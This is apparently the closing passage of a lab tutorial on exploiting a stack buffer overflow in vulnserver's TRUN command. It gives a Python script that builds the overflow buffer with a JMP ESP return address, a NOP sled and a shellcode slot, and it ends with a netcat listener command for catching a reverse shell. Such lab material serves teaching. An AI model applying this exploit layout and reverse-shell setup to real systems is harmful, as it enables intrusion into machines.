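Three things make this last stage fail silently: the return address written in the wrong byte order, a bad character hidden in the address or the shellcode, and a payload that no longer adds up to the 5075 bytes the crash needs. As an added example (not from the original post), the Python 3 code below assembles the same layout as the final script from the post's values and refuses to build it when any of those checks fails; it then reads the layout back to confirm the address really sits at offset 2003. The eight INT3 bytes stand in for the msfvenom output so that the example runs offline; they are a constructed placeholder, not shellcode.

```python
import struct

# Values from the post (vulnserver TRUN on Windows XP SP3, essfunc.dll)
PREFIX = b"TRUN /.:/"
TOTAL_LEN = 5075            # crash length found with SPIKE
OFFSET = 2003               # bytes before the saved return address (pattern_offset)
JMP_ESP = 0x625011AF        # JMP ESP inside essfunc.dll
NOP_SLED = 16
BAD_CHARS = b"\x00"         # the only bad character found for TRUN


def pack_address(addr):
    """Encode a 32-bit address the way it must appear in the buffer on x86:
    little-endian, least significant byte first (0x625011AF -> AF 11 50 62)."""
    return struct.pack("<I", addr)


def bad_chars_in(data, bad=BAD_CHARS):
    """Sorted list of bad byte values that occur in data (empty if clean)."""
    return sorted(b for b in bad if b in data)


def build_buffer(shellcode, offset=OFFSET, ret=JMP_ESP, total=TOTAL_LEN, nops=NOP_SLED):
    """Assemble prefix | A*offset | ret | NOP sled | shellcode | C filler so that
    the payload is exactly `total` bytes, as in the post's final script, and
    refuse to build anything that would fail silently on the target."""
    ret_bytes = pack_address(ret)
    if bad_chars_in(ret_bytes):
        raise ValueError("return address %08X contains a bad character" % ret)
    found = bad_chars_in(shellcode)
    if found:
        raise ValueError("shellcode contains bad characters %r; re-encode it" % found)
    filler = total - offset - len(ret_bytes) - nops - len(shellcode)
    if filler < 0:
        raise ValueError("shellcode is %d bytes too long for the buffer" % -filler)
    return PREFIX + b"A" * offset + ret_bytes + b"\x90" * nops + shellcode + b"C" * filler


def layout(buf):
    """Read the layout back out of a built buffer: (return address as hex,
    payload length). A quick sanity check that the address really sits at the
    offset we measured and that the total length was preserved."""
    payload = buf[len(PREFIX):]
    ret = struct.unpack("<I", payload[OFFSET:OFFSET + 4])[0]
    return "%08X" % ret, len(payload)


if __name__ == "__main__":
    # Constructed stand-in for the msfvenom output: eight INT3 breakpoints, which
    # stop in the debugger at the start of the shellcode area so the layout can
    # be verified before any real payload is used.
    stand_in = b"\xcc" * 8
    print(layout(build_buffer(stand_in)))
```

Running the stand-in first is a useful habit: if the breakpoint trap fires right after the NOP sled, the offset, the byte order of the address and the length accounting are all confirmed, and any remaining problem is in the shellcode itself (usually a bad character the encoder was not told about).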

Now start a listener on the attacker machine with nc -nlvp 4444 (it has to be listening when the buffer is sent), then run the final script.

THAT'S IT FOLKS!! :)  Shell popped.  Have a freaking good time and day!